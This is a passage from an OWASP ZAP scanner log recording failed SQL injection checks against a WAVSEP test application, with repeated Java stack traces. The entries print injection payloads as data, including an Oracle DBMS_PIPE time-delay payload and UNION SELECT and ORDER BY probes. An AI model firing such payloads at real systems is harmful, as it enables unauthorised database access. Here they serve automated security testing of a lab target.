org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680761 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 4611=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(72)||CHR(67)||CHR(79),5)-- vUVJ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 4611=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(72)||CHR(67)||CHR(79),5)-- vUVJ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680762 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680763 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680763 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680764 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 7249-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 7249-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680765 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680766 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680766 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680767 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 2471-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 2471-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680767 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680768 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680769 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680770 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid 